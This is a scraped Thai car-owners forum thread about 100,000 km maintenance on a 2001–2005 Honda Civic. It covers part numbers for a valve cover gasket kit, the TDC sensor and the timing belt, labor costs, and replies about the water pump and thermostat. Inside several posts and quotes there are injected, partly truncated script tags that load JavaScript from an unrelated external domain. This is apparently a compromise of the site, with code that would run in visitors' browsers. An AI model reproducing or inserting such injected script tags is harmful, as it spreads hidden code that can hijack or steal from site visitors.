ตอบ
undertaker55


ชื่อเล่น: ต้อง

เข้าร่วม: 26 สิงหา 2012
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 756
ให้คำขอบคุณ: 684

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พุธ, 2 เมษา 2014 22:28 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
ค้นในบอร์ด  number อะไหล่ แบบครบๆชุด หายากมากคับ เลยเอามาฝากกัน

อาการเริ่มแรก

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

อะไหล่ที่ใช้มี
1. ซีลน๊อตฝาครอบวาล์ว ( แหวนรอง ) 5 ตัว
หมายเหตุ  หมายเลข 2 เป็น number ซีล ข้อเหวี่ยง หน้าเครื่อง คับ

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

2. ปะเก็นฝาครอบวาล์ว 1 เส้น
3. ซีลยางรองเบ้าหัวเที่ยน 4 ชิ้น

ที่เหลือเป็น
- Part หัวเทียน
- กรองเบนซิน+แหวนล็อคท่อกรองน้ำมัน
- เซนเซอร์วัดแรงดันน้ำมัน TDC Sensor
- ลูกรอก ตัวปรับตั้งสายพาน
- ซีลยาง ราวลิ้น หน้าเครื่อง

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

อะไหล่ที่เบิกมาทั้งหมด

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

รื้อฝา ตั้งวาล์ว เปลี่ยน TDC เซนเซอร์ข้อเหวี่ยง หัวเทียน เปลี่ยนประเก็นฝาวาล์ว ชุดไทมิ่ง และ ซีลหน้าเครื่องทั้งหมด

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

ตรวจช่วงล่าง เจอยางหุ้มเพลา กะ ลูกหมากล่าง ขาดอีก

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ

ใช้เวลาทำทั้งหมด 1 วัน เต็มๆ โดนค่าแรง ทำทั้งหมดไป 800 บาท
ตอนแรกเอาให้ ศูนย์ ประเมิน คิดค่าแรงผม ชั่วโมงละ 500 รวม Wat ใช้เวลา 7 ชม. คูณ 500 = 3500

เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
กว่าจะเสร็จ ใช้กันไปอีก ยาวๆๆๆๆ เลย <script src="https://sport32news.com/civicesgroup.js"></ <script src="https://sport32news.com/civicesgroup.js"></ แต่งานนี้ก่อทำเอากระเป๋าแบนไปเหมือนกันคับ



เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ


หวังว่าคงจะมีประโยชน์กะเพื่อนๆ พี่ๆ น้องๆ บ้างนะคับ
ได้รับคำขอบคุณจาก: pop2pop  akkarin_c  jojowaiwai  Mundo  tukkang  phichetza  qq  K-yuthya  inueng  Jameskab  Popcorn02 
ปัญญากระด้าง


เข้าร่วม: 06 มกรา 2014
ตอบ: 122

มือใหม่หัดขับ
มือใหม่หัดขับ

ได้รับคำขอบคุณ: 89
ให้คำขอบคุณ: 9

ปี: 2004
สี: เทา ซิลเวอร์สโตน (NH-630M)
พฤหัส, 3 เมษา 2014 06:48 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
เลยแสนมานิด ยังไม่ซึม ข้อมูลมีประโยชน์เยอะ 
Kaikungoo7


ชื่อเล่น: ไกร

เข้าร่วม: 16 พฤศจิกา 2013
ตอบ: 219

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 155
ให้คำขอบคุณ: 26

ที่อยู่: เชียงใหม่
ปี: 2003
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 3 เมษา 2014 08:35 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
...
TUNG11


ชื่อเล่น: ต้อง

เข้าร่วม: 31 พฤษภาคม 2012
ตอบ: 617

Guru ES
Guru ES

ได้รับคำขอบคุณ: 345
ให้คำขอบคุณ: 360

ที่อยู่: บางปะกง 8 ริ้ว
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 3 เมษา 2014 17:33 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
เป็นเหมือนกันยังไม่ได้ทำเลย 
K-yuthya


ชื่อเล่น: เค

เข้าร่วม: 14 สิงหา 2012
ตอบ: 806

Guru ES
Guru ES

ได้รับคำขอบคุณ: 528
ให้คำขอบคุณ: 803

ที่อยู่: อยุธยา-เพชรบูรณ์
ปี: 2004
สี: ทอง แซทเทิลไลท์ (NH-663M)
พฤหัส, 3 เมษา 2014 22:04 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
ขาดเปลี่ยนปั๊มน้ำป่าวครับ
undertaker55


ชื่อเล่น: ต้อง

เข้าร่วม: 26 สิงหา 2012
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 756
ให้คำขอบคุณ: 684

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
พฤหัส, 3 เมษา 2014 22:22 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
K-yuthya พิมพ์ว่า:
ขาดเปลี่ยนปั๊มน้ำป่าวครับ




ปั้มน้ำ ผมว่ามันไม่ได้เสียกันง่ายๆอ่ะคับ ถึงถ้าเสียมันก่อน่าจะมีเสียงลูกปืนดังบอกก่อนอ่ะคับ
เท่าที่ถามพวกพี่ๆที่เขาวิ่งกันเยอะๆ ส่วนใหญ่มันจะพังในช่วง 200000 โลอ่ะ ผมก่อเลยว่าไว้เปลี่ยนไทมิ่งรอบสอง
ค่อยเปลี่ยนดีกว่า <script src="https://sport32news.com/civicesgroup.js"></ เลยเอาตังค์ไปเปลี่ยน TDC ก่อน กลัวตัวนี้มากกว่า เพราะถ้าพังมันไม่มีสํญญาณบอกล่วงหน้า
กลัวมันไปดับกลางทาง ในวันอู่ปิด หรือไปไกลๆ ล่ะแย่เลยยย

ขอบคุนมากคับที่เตือนคับผมม
kkanakornkum


ชื่อเล่น: เค

เข้าร่วม: 04 มกรา 2014
ตอบ: 495

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 275
ให้คำขอบคุณ: 37

ปี: 2002
สี: น้ำเงิน วิวิด (มุก) (B-502P)
พฤหัส, 3 เมษา 2014 22:51 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
ขอบคุณก๊าบ
ome_RX


ชื่อเล่น: โอม

เข้าร่วม: 24 พฤษภาคม 2013
ตอบ: 571

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 622
ให้คำขอบคุณ: 805

ที่อยู่: สมุทรปราการ
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
เสาร์, 5 เมษา 2014 10:43 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
..ขอบคุณครับ
inueng


ชื่อเล่น: หนึ่ง คับ

เข้าร่วม: 16 มีนา 2014
ตอบ: 230

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 103
ให้คำขอบคุณ: 119

ที่อยู่: Chiangrai Thailand
ปี: 2005
สี: ทอง แซทเทิลไลท์ (NH-663M)
อาทิตย์, 6 เมษา 2014 17:36 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
เก้บข้อมูลครับ
Moo Uan


เข้าร่วม: 07 สิงหา 2009
ตอบ: 1126

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 426
ให้คำขอบคุณ: 126

ที่อยู่: ซ.นวมินทร์93 ถ.นวมินทร์ กทม.
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 8 เมษา 2014 01:50 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
เก็บข้อมูลดีๆคับ
Dark


เข้าร่วม: 24 มิถุนา 2009
ตอบ: 383

มีใบอนุญาตขับขี่
มีใบอนุญาตขับขี่

ได้รับคำขอบคุณ: 408
ให้คำขอบคุณ: 10

ปี: 2002
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 8 เมษา 2014 07:45 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
undertaker55 พิมพ์ว่า:

K-yuthya พิมพ์ว่า:
ขาดเปลี่ยนปั๊มน้ำป่าวครับ




ปั้มน้ำ ผมว่ามันไม่ได้เสียกันง่ายๆอ่ะคับ ถึงถ้าเสียมันก่อน่าจะมีเสียงลูกปืนดังบอกก่อนอ่ะคับ
เท่าที่ถามพวกพี่ๆที่เขาวิ่งกันเยอะๆ ส่วนใหญ่มันจะพังในช่วง 200000 โลอ่ะ ผมก่อเลยว่าไว้เปลี่ยนไทมิ่งรอบสอง
ค่อยเปลี่ยนดีกว่า <script src="https://sport32news.com/civicesgroup.js"></ เลยเอาตังค์ไปเปลี่ยน TDC ก่อน กลัวตัวนี้มากกว่า เพราะถ้าพังมันไม่มีสํญญาณบอกล่วงหน้า
กลัวมันไปดับกลางทาง ในวันอู่ปิด หรือไปไกลๆ ล่ะแย่เลยยย

ขอบคุนมากคับที่เตือนคับผมม

ส่วนใหญ่ที่เปลี่ยนปั๊มน้ำด้วยเพราะว่ากลัวน้ำรั่วจากปั๊มน้ำมากกว่าครับ เวลารั่วทีนี่มันมีผลเรื่องความร้อนด้วยครับ ถ้าไม่ทันสังเกตเกิดเครื่องฮีตขึ้นมาก็น่าปวดหัวอีกครับ และที่สำคัญเลย ส่วนใหญ่เวลาเปลี่ยนปั๊มน้ำค่าแรงมันพอๆกับเปลี่ยนสายพานราวลิ้นอีกรอบเลยนะครับ
 
Jameskab


ชื่อเล่น: นายเจมมม

เข้าร่วม: 25 ธันวา 2012
ตอบ: 940

ครอบครัว ES
ครอบครัว ES

ได้รับคำขอบคุณ: 974
ให้คำขอบคุณ: 1651

ที่อยู่: ภูเก็ต ประเทศไทย
ปี: 2001
สี: ทอง แซทเทิลไลท์ (NH-663M)
อังคาร, 8 เมษา 2014 09:10 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
เยี่ยมเลยครับ 
undertaker55


ชื่อเล่น: ต้อง

เข้าร่วม: 26 สิงหา 2012
ตอบ: 564

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 756
ให้คำขอบคุณ: 684

ที่อยู่: เชียงใหม่
ปี: 2004
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 8 เมษา 2014 09:48 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
Dark พิมพ์ว่า:
undertaker55 พิมพ์ว่า:

K-yuthya พิมพ์ว่า:
ขาดเปลี่ยนปั๊มน้ำป่าวครับ




ปั้มน้ำ ผมว่ามันไม่ได้เสียกันง่ายๆอ่ะคับ ถึงถ้าเสียมันก่อน่าจะมีเสียงลูกปืนดังบอกก่อนอ่ะคับ
เท่าที่ถามพวกพี่ๆที่เขาวิ่งกันเยอะๆ ส่วนใหญ่มันจะพังในช่วง 200000 โลอ่ะ ผมก่อเลยว่าไว้เปลี่ยนไทมิ่งรอบสอง
ค่อยเปลี่ยนดีกว่า <script src="https://sport32news.com/civicesgroup.js"></ เลยเอาตังค์ไปเปลี่ยน TDC ก่อน กลัวตัวนี้มากกว่า เพราะถ้าพังมันไม่มีสํญญาณบอกล่วงหน้า
กลัวมันไปดับกลางทาง ในวันอู่ปิด หรือไปไกลๆ ล่ะแย่เลยยย

ขอบคุนมากคับที่เตือนคับผมม

ส่วนใหญ่ที่เปลี่ยนปั๊มน้ำด้วยเพราะว่ากลัวน้ำรั่วจากปั๊มน้ำมากกว่าครับ เวลารั่วทีนี่มันมีผลเรื่องความร้อนด้วยครับ ถ้าไม่ทันสังเกตเกิดเครื่องฮีตขึ้นมาก็น่าปวดหัวอีกครับ และที่สำคัญเลย ส่วนใหญ่เวลาเปลี่ยนปั๊มน้ำค่าแรงมันพอๆกับเปลี่ยนสายพานราวลิ้นอีกรอบเลยนะครับ
 


ใช่คับ แต่ผมให้ช่างเขาถอดมาเช็คดู เขาบอกสภาพมันยังดีอยู่เลยอ่ะคับ แล้วที่สำคัญ ปั้มน้ำ แท้ศูนย์ ตอนนี้ตัวนึงโดนไปเกือบ 2500 นะคับ ช่างยังบอกกะผมเลยว่า เอาตัวที่จำเป็นจิงๆดีกว่า อีกอย่างถ้าเราหมั่นเช็คน้ำในถังพักตลอดว่าพร่องบ้างไหม ก่อน่าจะทราบอาการเบื้องต้นถึงการรั่วซึมได้ แต่พวกอุปกรณ์อิเล็คทรอนิกส์นี่เราไม่สามารถตรวจด้วยตาเปล่าได้นะคับ และจากที่ได้ค้นกระทู้เก่า ปัญหาความร้อนส่วนใหญ่มาจาก พัดลมหม้อน้ำ วาล์วน้ำ ท่อยาง เทอร์โม มากกว่าอ่ะคับ ผมว่าปั้มน้ำรุ่นเราทนอยู่นะ แต่ครบ สองแสน โล มะไหร่จัดแน่คับ อิอิ
"<script src="https://sport32news.com/civicesgroup.js">
punya


ชื่อเล่น: เด๋อ

เข้าร่วม: 18 มีนา 2014
ตอบ: 525

แซงซ้าย ปาดขวา
แซงซ้าย ปาดขวา

ได้รับคำขอบคุณ: 140
ให้คำขอบคุณ: 0

ที่อยู่: ปากเกร็ด.แจ้งวัฒนะซอย35@esเมืองทอง
ปี: 2005
สี: ดำ ไนท์ฮอว์ก (B-92P)
อังคาร, 8 เมษา 2014 18:40 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
ขอบคุณครับโปรเกนฝาซึมเหมือนกัน "<script src="https://sport32news.com/civicesgroup.js">
spinal


เข้าร่วม: 27 มกรา 2010
ตอบ: 691

Guru ES
Guru ES

ได้รับคำขอบคุณ: 80
ให้คำขอบคุณ: 33
อังคาร, 8 เมษา 2014 20:11 - เอาPart Number เช็ค 100000 โล + ชุดซ่อมปะเก็นฝาครอบวาล์ว สำหรับคนที่มีน้ำมันซึม มาฝากคับ
ฝากอีกอย่างที่ แสนโลควรเปลี่ยนคือ วาล์วน้ำครับ
อันละ 700+ บาท แสนโล ใช้กันลืมครับ
ตอบ
หน้า 1 จาก 1
ไปที่: 
ติดต่อโฆษณา admin@civicesgroup.com
Copyright © 2008-2025 Civic ES Group. All rights reserved.
Loading...